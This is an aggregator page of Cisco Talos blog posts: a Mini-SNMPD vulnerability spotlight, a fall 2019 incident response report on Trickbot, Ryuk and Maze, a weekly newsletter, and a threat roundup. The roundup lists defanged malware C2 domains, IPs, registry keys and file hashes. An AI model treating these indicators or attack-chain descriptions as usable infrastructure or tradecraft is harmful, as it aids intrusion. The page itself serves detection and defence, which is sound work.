Quantcast
Channel: Cisco Talos Blog
Viewing all 1927 articles
Browse latest View live

Vulnerability Spotlight: Denial-of-service, information leak bugs in Mini-SNMPD

$
0
0

Aleksandar Nikolic of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw.

Multiple vulnerabilities exist in Mini-SNMPD, a lightweight implementation of a Simple Network Management Protocol server. An attacker can exploit these bugs by providing a specially crafted SNMPD request to the user. These vulnerabilities could lead to a variety of conditions, potentially resulting in the disclosure of sensitive information and a denial-of-service condition.

Mini-SNMPD's small code size and memory footprint make it especially suitable for small and embedded devices. It is used, for example, by several devices based on the OpenWRT project.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Mini-SNMPD to ensure that these issues are resolved and that an update is available for affected customers. Talos also provided the patch for these issues.

Vulnerability details

Mini-SNMPD decode_cnt information leak vulnerability (TALOS-2020-0975/CVE-2020-6058)

An exploitable out-of-bounds read vulnerability exists in the way MiniSNMPD version 1.4 parses incoming SNMP packets. A specially crafted SNMP request can trigger an out-of-bounds memory read, which can result in the disclosure of sensitive information and denial of service. To trigger this vulnerability, an attacker needs to send a specially crafted packet to the vulnerable server.

Read the complete vulnerability advisory here for additional information.

Mini-SNMPD decode_int information leak vulnerability (TALOS-2020-0976/CVE-2020-6059)

An exploitable out-of-bounds read vulnerability exists in the way MiniSNMPD version 1.4 parses incoming SNMP packets. A specially crafted SNMP request can trigger an out-of-bounds memory read, which can result in the disclosure of sensitive information and denial of service. To trigger this vulnerability, an attacker needs to send a specially crafted packet to the vulnerable server.

Read the complete vulnerability advisory here for additional information.

Mini-SNMPD socket disconnect denial-of-service vulnerability (TALOS-2020-0977/CVE-2020-6060)

A stack buffer overflow vulnerability exists in the way MiniSNMPD version 1.4 handles multiple connections. A specially timed sequence of SNMP connections can trigger a stack overflow, resulting in a denial of service. To trigger this vulnerability, an attacker needs to simply initiate multiple connections to the server.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that version 1.4 of Mini-SNMPD is affected by these vulnerabilities.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 52836, 52837


Quarterly Report: Incident Response trends in fall 2019

$
0
0

By David Liebenberg and Kendall McKay.

While many Cisco Talos Incident Response (CTIR) engagements have shown similar patterns over the past two quarters, we’re seeing a dangerous trend emerge this winter. Threat actors are increasingly combining the exfiltration of sensitive data along with data encryption as new levers to compel victims to pay.

Targeting

A wide variety of verticals were once again targeted, including media, government, healthcare, and manufacturing, with the latter representing the top vertical targeted. The number of engagements closed out was around the same as the previous quarter.

Threats

Although we observed some new trends this quarter — including an uptick in web application exploits, a website defacement incident, and some new evasive tactics — this quarter demonstrated the continued threat posed by Trickbot, especially when it is leveraged as a dropper for ransomware such as Ryuk. The top threats for fall 2019 remained Trickbot and Ryuk. In a typical engagement, the target would receive a phishing email with a malicious link or document attached that would lead to the victim downloading Trickbot. The adversaries would use Trickbot and open-source tools such as PowerShell, Empire, or Bloodhound to profile the victim, eventually dropping Ryuk after some dwell time (in one engagement, this lasted up to nearly a year) and demanding a ransom.

We also observed an instance of threat actors using an unusual method to deploy Ryuk. Following a Trikbot infection, the adversaries deployed Ryuk throughout the Active Directory environment as a group policy object, whereas adversaries typically leverage PsExec to deploy the ransomware.

The top threats observed this quarter are relatively consistent with those from the last quarter, though the commodity trojan Emotet appeared much less frequently. In another change, we did not observe any incidents related to illicit mining, though there was a reemergence in the winter. We did, however, observe some malware that we had not seen in the previous quarter, including infostealers like Lokibiot and Avemaria, ASP web shells, and the Frenchy toolkit.

Initial Vectors

Phishing remained the top infection vector. CTIR also observed an uptick in web application exploitation, including the exploitation of newer vulnerabilities, such as in the Palo Alto GlobalProtect SSL VPN. We also observed third-party compromise in which a target’s GitHub account was compromised and the attackers stole a stored Amazon identity access management account.

Actions after compromise


Actions post-compromise remained consistent with last quarter, ranging from encrypting data to connecting to command-and-control and moving laterally throughout the victim network. We did observe defacement this quarter as well as an uptick in evasive actions.

Looking forward

Although this blog covers fall 2019, CTIR has observed initial indicators that suggest an evolution in threat actor behavior in winter 2019/2020: Ransomware actors have begun exfiltrating sensitive data from victim organizations and threatening to publish them if the ransom is not paid.

Talos observed this behavior in two separate engagements in the winter that were perpetrated by the same actor. In both incidents, the actor leveraged the offensive security tool CobaltStrike to traverse the network and gather systems and data. The actor then exfiltrated the data using PowerShell to connect to an FTP server, after which the adversary deployed Maze ransomware in the victim environment.

This same actor had been observed by other security researchers threatening to release sensitive information if the ransom was not paid, and in several instances, followed through on that threat. This represents a major and dangerous shift in ransomware actor behavior because exfiltration further compels victim organizations to pay the ransom and ensures a significant impact even if proper measures such as backing up important information are implemented. It also shows an advancement in victim profiling by the actors, who may believe that large enterprises will be more willing to pay to keep sensitive data from being published. There are indications that other threat actors are beginning to mimic this behavior.

CTIR will provide additional details on this new behavior in next quarter’s report.

Threat Source newsletter (Feb. 6, 2020)

$
0
0

Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

There’s never been a better time to be into cyber security podcasts. Our Podcasts page on TalosIntelligence.com got a facelift this week to make room for our new show, Talos Takes. Now, Beers with Talos and Talos Takes live on the same page, where you can get caught up on your cyber news each week.

During each episode of Talos Takes, our researchers and analysts will boil down a complicated topic into a minutes-long explainer that everyone from your parents to the CEO of your company will understand. You can subscribe to Talos Takes on Apple Podcasts, Spotify, Stitcher and Pocket Casts.

As if that wasn’t enough, we also released a new Beers with Talos episode Friday, where the guys discuss why PowerShell has been so widely used in malware.

And, as always, we have the latest Threat Roundup where we go through the top threats we saw — and blocked — over the past week.

Upcoming public engagements

Event: A World of Threats: When DNS becomes the new weapon for governments at Swiss Cyber Security Days 
Location: Forum Fribourg, Granges-Paccot, Switzerland
Date: Feb. 12 - 13
Speakers: Paul Rascagnères
Synopsis: In this presentation, Paul will present two threat actors Cisco Talos has been tracking who are manipulating the DNS system. On Jan. 22, 2019, the U.S. DHS published a directive concerning this attack vector. We will present the timeline for these events and their technical details. One of the actors is behind the campaign we named “Sea Turtle.” This actor is more advanced and more aggressive than others we’ve observed in the past. They do not hesitate to directly target registrars and one registry. The talk will break down these two actors and the methodology used to target the victims.

Event: “Everyone's Advanced Now: The evolution of actors on the threat landscape” at Interop Tokyo 2020
Location: Makuhari Messe, Tokyo, Japan
Date: April 13 - 15
Speakers: Nick Biasini
Synopsis: In the past, there were two clear classes of adversary an enterprise would face: sophisticated and basic. These basic threats were commodity infections that would require simple triage and remediation. Today, these commodity infections can quickly turn into enterprise-crippling ransomware attacks, costing organizations millions of dollars to recover. Now more than ever, organizations need every advantage they can get — and threat intelligence is a big part of it. Having visibility into your own environment and attacks around the globe are equally vital to success. This talk will cover these trends and show how the gap between the sophisticated and the basic adversary is quickly disappearing.

Cyber Security Week in Review

  • Problems with an election results-reporting app led to the delay of Democratic presidential primary results in Iowa this week. Election officials in the state say the app, developed by company Shadow Inc., was not hacked, though security experts say they discovered several flaws in the software that left it open to attack. 
  • The Iowa debacle was embarrassing for the Democratic party and the state, since Iowa prides itself on being the first state to host primary elections, setting the stage for the rest of the presidential election. After the mishap, other states are looking into what types of backup plans they need to have in place for their own elections. 
  • Amazon CEO Jeff Bezos may have met with FBI investigators as far back as April 2019 regarding the hacking of his iPhone. The interview reportedly took place as part of the FBI’s investigation into the Israeli technology company NSO Group. 
  • Gamaredon, an APT with pro-Russian ties, is growing its capabilities. New research shows the group has stepped up its operations so far this year, targeting a larger number of victims and focusing even more on disrupting the Ukrainian government. 
  • The EKANS ransomware recently added new capabilities to make it more effective against industrial control services. However, researchers believe the malware’s capabilities are still somewhat primitive.  
  • Cargo shipments across Australia are on hold after the logistics company Toll was hit with a ransomware attack. The company says it’s seen no evidence to suggest any personal data was lost. 
  • The U.S. government is pushing tech companies and government agencies to develop an alternative to Chinese company Huawei’s 5G service. Huawei’s been locked in a battle with America for years over security concerns. 
  • A vulnerability in Google Photos could have allowed anyone to view and download other users’ private videos. Google Takeout, a service that allows users to download archives of their Google data, mistakenly included the wrong videos in some files.  
  • Google released the latest update for its Chrome web browser this week, fixing 56 vulnerabilities. The new version also forces more content through HTTPS rather than the less secure HTTP. 
  • The NSA’s decision to publicly disclose an urgent bug in Microsoft Internet Explorer could point toward bigger changes for the agency. Traditionally, the NSA has held onto vulnerabilities it discovers that it believes could be used to spy on other state-sponsored actors. 

Notable recent security issues

Title: NetWire RAT reappears with financial motivations
Description: Security researchers recently discovered a new variant of the NetWire remote access trojan being spread via fake business emails. Attackers are sending supposed invoices from legitimate-looking emails that download the RAT. Once infected, NetWire carries out a series of malicious actions that all appear aimed at stealing users’ financial information and logins. NetWire first emerged in 2012, and has since gone through various iterations across multiple adversaries.
Snort SIDs: 53026 – 53030

Title: Cisco small business switches open to denial of service attacks
Description: Cisco disclosed two high-severity vulnerabilities in some of its small business switches. An attacker could exploit these vulnerabilities to carry out denial-of-service attacks or obtain sensitive information. The Series Smart Switches, Series Managed Switches and Series Stackable Managed Switches are all vulnerable, though a patch is now available. Cisco said in its vulnerability advisory that it was unaware of the active exploitation of any of these vulnerabilities.
Snort SIDs: 52993 - 52998

Most prevalent malware files this week

SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
MD5: 47b97de62ae8b2b927542aa5d7f3c858
Typical Filename: qmreportupload.exe
Claimed Product: qmreportupload
Detection Name: Win.Trojan.Generic::in10.talos

SHA 256: c0cdd2a671195915d9ffb5c9533337db935e0cc2f4d7563864ea75c21ead3f94 
MD5: 7c38a43d2ed9af80932749f6e80fea6f
Typical Filename: xme64-520.exe
Claimed Product: N/A 
Detection Name: PUA.Win.File.Coinminer::1201

SHA 256: 1460fd00cb6addf9806a341fee9c5ab0a793762d1d97dca05fa17467c8705af7 
MD5: 88cbadec77cf90357f46a3629b6737e6
Typical Filename: FlashHelperServices.exe
Claimed Product: Flash Helper Services
Detection Name: PUA.Win.File.2144flashplayer::tpd 

SHA 256: 85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5
MD5: 8c80dd97c37525927c1e549cb59bcbf3
Typical Filename: eternalblue-2.2.0.exe
Claimed Product: N/A
Detection Name: W32.85B936960F.5A5226262.auto.Talos

SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
MD5: e2ea315d9a83e7577053f52c974f6a5a
Typical Filename: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
Claimed Product: N/A
Detection Name: W32.AgentWDCR:Gen.21gn.1201

Keep up with all things Talos by following us on TwitterSnortClamAV and Immunet also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast here (as well as on your favorite podcast app). And, if you’re not already, you can also subscribe to the weekly Threat Source newsletter here.  

Threat Roundup for January 31 to February 7

$
0
0
Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 31 and Feb. 7. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center,  Snort.org, or ClamAV.net.


For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.
The most prevalent threats highlighted in this roundup are:

Threat NameTypeDescription
Doc.Downloader.Emotet-7572697-1 Downloader Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Malware.Nymaim-7569940-0 Malware Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain-generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
Win.Dropper.Genkryptik-7572204-0 Dropper Genkryptik is oftentimes a generic detection name for a Windows trojan. Some of the malicious activities that could be performed by these samples, without the user's knowledge, including collecting system information, downloading/uploading files and dropping additional samples.
Win.Worm.Gh0stRAT-7571319-1 Worm Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the Internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks.
Win.Ransomware.Cerber-7571364-0 Ransomware Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although, in more recent campaigns, other file extensions are used.
Win.Malware.Kovter-7571676-0 Malware Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries that store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
Win.Dropper.TrickBot-7577793-0 Dropper Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Packed.Zusy-7572206-0 Packed Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.

Threat Breakdown

Doc.Downloader.Emotet-7572697-1

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID 24
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID
Value Name: Type
24
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID
Value Name: Start
24
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID
Value Name: ErrorControl
24
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID
Value Name: ImagePath
24
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID
Value Name: DisplayName
24
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID
Value Name: WOW64
24
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID
Value Name: ObjectName
24
MutexesOccurrences
Global\I98B68E3C24
Global\M98B68E3C24
Global\IC019706B1
Global\MC019706B1
Global\8032E0D68359329601
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
169[.]254[.]255[.]2551
198[.]58[.]114[.]911
93[.]189[.]42[.]1461
5[.]2[.]75[.]1671
104[.]236[.]28[.]4725
133[.]130[.]97[.]6125
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
252[.]5[.]55[.]69[.]spam[.]abuse[.]ch1
252[.]5[.]55[.]69[.]spam[.]dnsbl[.]sorbs[.]net1
252[.]5[.]55[.]69[.]zen[.]spamhaus[.]org1
252[.]5[.]55[.]69[.]b[.]barracudacentral[.]org1
chonhangchuan[.]net25
Files and or directories createdOccurrences
%SystemRoot%\SysWOW64\msgchannelb.exe1
%SystemRoot%\SysWOW64\msgchannela.exe1
%APPDATA%\windirect\settings.ini1
%HOMEPATH%\532.exe25
%ProgramData%\4Cs14qtyjWERecs90J.exe1
%ProgramData%\8MoBR9ygNour.exe1

File Hashes

007fc647ae0f8639902f3c6ebae36e993f8b3fc08297118da2feb154df40740f 018ed3d6c7e96cb9010633c08acf5ddce16fccdaae299dfcf7d87e79eda6bd39 07e176a1c503e7a072f8a5f31b0871e961aae07fad606a3c3838b856442487eb 0860e692cd7444b9a85df9d15c46bfd707454cc8c1267d4de56260bf3d6cffa2 0de64e1664365414c3c529bb8dab306b995b61e34cb4d58b0d07ed6d716c715f 0f3358b0b2b1c8e74a38319daad492d7adcf2d130cc8dbd439c684c9c9e5153c 1a8fe6dd6c3cdf567f41bb6977a88c892473797acde8694ced39139640715bcb 1e835f85dc0631028c5bd4aaa75b166b8d9714642876339a4a86ef40973b6ace 220c8e32a0f771b62f01279391d3f93a40d3ce389b45d4ffff0699188792ea23 2cdc0e42a36a681175b5b3eeef29037709e43e7123aabc1f4bcee86fa06a4896 375eea419ae94249961ad625ce1dcd3502860bc1e6e396afb4570c735bf43803 3b89f52ac5385d9f8733f4ec6f3bb7721df689a5dd1c197bfcd3feffb9749dd4 62a2e813d32c179dfe3a565558a48fb0c5b9820b337458028a5232c5de9eaf42 8075bc50d7e867f0a255b9826f5c6bc35a0c82f1408ad3502b499055549c8e1f 85fbf7b289eaa61b99bcbe56e804abf3083cb14448b1ca8a9b20896989f27e9c 8f2d6be36b63d09c277df0cdf4788ed3c057cfaaa7d84e06e2e79ea9998d3dd6 93f972acfdb179a6ecdb35d1ff2602a197aaacb5039572bf5600ebc8186618c2 a892730b092202036e00e25cbdbd3464711db05ffa30c92d99eabeb8be5b6e1e b1ec2a137410f27af98fba5d9da34af0583feead57d2328aa98ecc0cca490081 b4b51782bfcebdf89072029a92244cd4bf53dfebbeb9f125c3bd721b9bc7855a b6160c8601befc7f62c4e3b274430b710c05e596d69d2c34e9710597336b35cb c00797ecdd835144cf9183edd42e45c2e4b117a4d1fafd670f9c2a4f464eba9a c50e5289d3bebdab1ba9b8d101d47596c8cc72e2616df6690189b1e99ce5268f d00f4a6e014ec6f602d2dd0a99fc10084f111ccae25bde16dd4ee05c204ba7c1 d558d946a685c29cfab63009dba1b91c2a870a2e623d028d0a70b96a9cf12d6f
*See JSON for more IOCs

Coverage

ProductProtection
AMPThis has coverage
Cloudlock N/A
CWSThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WSAThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella




Win.Malware.Nymaim-7569940-0

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\GOCFK 18
<HKCU>\SOFTWARE\MICROSOFT\GOCFK
Value Name: mbijg
18
MutexesOccurrences
Local\{369514D7-C789-5986-2D19-AB81D1DD3BA1}18
Local\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}18
Local\{F04311D2-A565-19AE-AB73-281BA7FE97B5}18
Local\{F6F578C7-92FE-B7B1-40CF-049F3710A368}18
Local\{306BA354-8414-ABA3-77E9-7A7F347C71F4}18
Local\{F58B5142-BC49-9662-B172-EA3D10CAA47A}18
Local\{C170B740-57D9-9B0B-7A4E-7D6ABFCDE15D}18
Local\{B888AC68-15DA-9362-2153-60CCDE3753D5}18
Local\{2DB629D3-9CAA-6933-9C2E-D40B0ACCAC9E}18
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
wfbimtogx[.]pw1
icbwujv[.]pw1
lcque[.]com1
odouzwyaw[.]in1
jknqnrpjgdgo[.]in1
hgbcdxmjm[.]net1
mnhtemsicp[.]in1
hcozsjtscf[.]pw1
vkerdawjo[.]in1
upkbwykuchtb[.]net1
adulvwixq[.]in1
rnhrlupcs[.]com1
ohxozfvoxg[.]com1
gphvrtnt[.]in1
zvsrc[.]pw1
vlddqnhkoxei[.]com18
elnqzs[.]net18
sxrzdfil[.]net18
papuzvj[.]net18
ffincb[.]com18
gnmhtaguavi[.]com18
pvwdgii[.]pw18
llrgmivfnqee[.]pw18
nknbtl[.]pw18
eeiheou[.]in18
*See JSON for more IOCs
Files and or directories createdOccurrences
%TEMP%\fro.dfx18
\Documents and Settings\All Users\pxs\pil.ohu18
%ProgramData%\ph18
%ProgramData%\ph\fktiipx.ftf18
%TEMP%\gocf.ksv18
%ProgramData%\<random, matching '[a-z0-9]{3,7}'>18
%APPDATA%\<random, matching '[a-z0-9]{3,7}'>18
%LOCALAPPDATA%\<random, matching '[a-z0-9]{3,7}'>18

File Hashes

0b4181b933a8d0d350a9df085ac98a27350d49cd8bdded69b0153d5ec6adda21 1224eeb04e14029eec5a711ea7b973954f272851d6f4b4d02fecd4b40ebbd3e5 134d474322c25989e1aa2b6c807473d8a099b06716afcc1904dcadadd74e14d9 20c0747e95843e9c09806f7ef954cfd35c94e2b67907617a3bc0299e00026198 3e5ad8831233e388f485cd6b99c4d6687f1d6e38623bf48d2270919aa4d9e000 59445c64816f7513250a3b49cf5a513c842098be8f3730b33056705ef5c1d624 80cb190082bd6b3e0ec0657a1fd76ae5a53e434e19363e93f6ae999135f99594 89adc81706b7dd975f63be1f1269f63add24f292f5c0d93c92b4b411eb6a9fbc 93fbb35c72feccabccdf4d903d10be4bf0090141cef91dfb0e34ab021138c4ba 9dae9cc1db48a1f31f54b1430f72b5a275c5b36afe274510ff25464d6f7f85a2 b43e324ed527c2d52660e31595b5f61c2151808d351ed80fc853e1345bbf6b5c b828ad714533bdca9fbfd96e14bc8fdcb30f1687bade3025b6b1ddfcf46fb793 c90c69db988bc69ec5a6e82e0b71f006d3ad1309bb8f722a8361fdf2cd573f66 db35f03ab4fb2eff6dfa485e85433f4a61016fc2e18b17793e8e0b6c8afe5585 e3795c261bb84415e76175eee1b7d07aa335b690952116b84cc297a1bbd83001 e71d8f0a51ecf0d078930da518e6b7e8c4c001d42200e0e6965691e8fe1549ea ec3b170ebe1a9a524091d5c46da9080f07a409fb11c51a841b695951f14062ba f84a9b3bcfadbeca17b80922487f7632df91f8a1a4adfde04924c7b9f9b54cd0

Coverage

ProductProtection
AMPThis has coverage
Cloudlock N/A
CWSThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WSAThis has coverage

Screenshots of Detection

AMP


ThreatGrid



Win.Dropper.Genkryptik-7572204-0

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE
Value Name: Blob
10
<HKCU>\SOFTWARE\WINRAR 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Startup key
2
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9
Value Name: F
2
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5
Value Name: F
2
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC
Value Name: F
2
<HKCU>\SOFTWARE\WINRAR
Value Name: HWID
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: IpgKLBFV
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: enchantsf
1
MutexesOccurrences
3749282D282E1E80C56CAE5A1
Global\{fb001475-4304-414b-b3c4-440bd0301e5f}1
Global\{26af037d-c127-451a-807e-f8d8fcf61bd9}1
Global\{a7ae8b72-b465-4a93-b481-e821d4114233}1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
172[.]217[.]11[.]461
172[.]217[.]10[.]2387
172[.]217[.]7[.]142
172[.]217[.]164[.]1741
172[.]217[.]7[.]12
172[.]217[.]10[.]2257
198[.]251[.]81[.]301
88[.]233[.]219[.]1881
185[.]61[.]154[.]201
193[.]142[.]59[.]981
79[.]134[.]225[.]1251
79[.]134[.]225[.]51
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
parking[.]namesilo[.]com1
labosan[.]hr1
doc-14-b8-docs[.]googleusercontent[.]com1
doc-0s-14-docs[.]googleusercontent[.]com1
doc-0s-5o-docs[.]googleusercontent[.]com1
doc-0c-80-docs[.]googleusercontent[.]com1
steel500[.]duckdns[.]org1
doc-08-bs-docs[.]googleusercontent[.]com1
doc-04-2c-docs[.]googleusercontent[.]com1
olodofries88[.]ddns[.]net1
doc-0c-bo-docs[.]googleusercontent[.]com1
doc-08-68-docs[.]googleusercontent[.]com1
doc-0o-bo-docs[.]googleusercontent[.]com1
www[.]habitactica[.]com1
www[.]71kamahistreet[.]com1
Files and or directories createdOccurrences
%APPDATA%\D282E11
%APPDATA%\D282E1\1E80C5.lck1
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c51
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C53
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs3
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator3
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat3
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\task.dat2
%System32%\Tasks\AGP Manager2
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\catalog.dat1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\settings.bin1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\storage.dat1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\settings.bak1
%TEMP%\53d8a91c-2dcd-4297-b0e0-e83b641b15e11
%TEMP%\96d19517-693a-4d9b-b0bb-58fe0e73df6a2
%HOMEPATH%\subfolder12
%APPDATA%\poblyXd1
%APPDATA%\poblyXd\OeqyZ.exe1
%TEMP%\tmp6C23.tmp1
%TEMP%\tmpB4EC.tmp1
%HOMEPATH%\subfolder1\filename1.exe1
%HOMEPATH%\BENZOXYPHE1
%HOMEPATH%\BENZOXYPHE\ARCSINEB.exe1
%HOMEPATH%\subfolder1\filename1.bat1
%TEMP%\2022119685.bat1
*See JSON for more IOCs

File Hashes

0b023aa63679132222f38f83cc5d068b64294f27378657a83d5a1e382a0f5f6a 1e25b0da80f232dd7736f1df2d02c06c5352468c2b28edd38a5325ad726f4318 311e0a1c78adebcb8f4557b7982add59176bf534575f372b15de89b350f043be 56acc6bbd93fa3697f5c18ce956bc9fed48780a62f2de0af0422edc832a59cd7 5a4ae15c7cfc24d8d051199a42438fb860630f20eaf1d860a57b4483a9b2a1e5 62183848f4eb2622fa3c83e80d47993b177654cfd514479af13b35ccda07a9e1 6d878ebe8f57192c2a5a30313d09dcfc0a5535369dbaf3df1853148e260c15b2 a06f1515117373a10440cfc5fabd3a4edaa6bad649aa51512da3c84b732737f2 a49994d715e1420a4aeda5a840281d6a502b9785f4e9c900f1528a862f4f459d ba8781428af0e8996029c8c2a9ed858e67a1433123bf866459f112c6b1a4adb9 ec2b8daf0e06c86331993b6b47402bcfe64d7192860ff1fd9b12bf74c5412df5

Coverage

ProductProtection
AMPThis has coverage
Cloudlock N/A
CWSThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WSAThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella




Win.Worm.Gh0stRAT-7571319-1

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: TFM0N
17
MutexesOccurrences
pldofjxf17
67.198.149.220:859017
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
67[.]198[.]149[.]22017
67[.]198[.]149[.]21817
Files and or directories createdOccurrences
\M7LTT2PQLUU397791
\4E332EPXUP2T2UDD1
\4E332EPXUP2T2UDD\setting.xml1
\X1MEDE9U9MQ4Q1UV\setting.xml1
\M7LTT2PQLUU39779\setting.xml1
\PLT3XTU7P91P4DXM1
\EVE2ML37TPT2MTQ31
\EVE2ML37TPT2MTQ3\setting.xml1
\9T7UQELV1DED3E1U1
\3X2MMX7MP34P213D1
\9T7UQELV1DED3E1U\setting.xml1
\3X2MMX7MP34P213D\setting.xml1
\MM393UEXP3U1V39T1
\MM393UEXP3U1V39T\setting.xml1
\4D7913VVQ473ETLX1
\4D7913VVQ473ETLX\setting.xml1
\3M2QLV9D1LQD4DUM1
\3M2QLV9D1LQD4DUM\setting.xml1
\PLT3XTU7P91P4DXM\setting.xml1
\L4DV7DE92PLT3L7V1
\L4DV7DE92PLT3L7V\setting.xml1
\PM9X2XM11XL7TP9P1
\PM9X2XM11XL7TP9P\setting.xml1
\TX19M1LQ22VD4X9P1
\TX19M1LQ22VD4X9P\setting.xml1
*See JSON for more IOCs

File Hashes

